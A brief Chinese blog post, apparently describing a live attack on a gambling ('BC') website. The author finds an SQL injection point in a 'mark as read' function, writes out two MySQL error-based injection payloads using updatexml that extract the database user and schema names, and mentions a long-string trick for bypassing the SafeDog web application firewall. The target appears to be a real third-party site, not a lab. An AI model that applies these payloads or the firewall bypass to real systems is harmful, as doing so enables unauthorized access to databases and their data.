BC实战|Bypass安全狗

BC实战|Bypass安全狗

学以致用。

漏洞发现

常规流程走一遍,发现一处标记信息已读的功能点比较可疑:

BC实战|Bypass安全狗

抓包加单引号重放:

BC实战|Bypass安全狗

可以看到单引号被转义了,看下闭合方式,问题不大,因为有回显,直接使用报错注入。

报错注入

获取下数据库用户

127) or updatexml(1,concat(0x3a,user()),1
BC实战|Bypass安全狗

获取数据库

127) or updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 0,1),1
BC实战|Bypass安全狗

Bypass安全狗

掏出前段时间学到的打狗棒法(超长字符Bypass,这里类型不同,原理相同):传送门

BC实战|Bypass安全狗

后面的和常规报错没什么不同,就不啰嗦了,领会精神~

© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容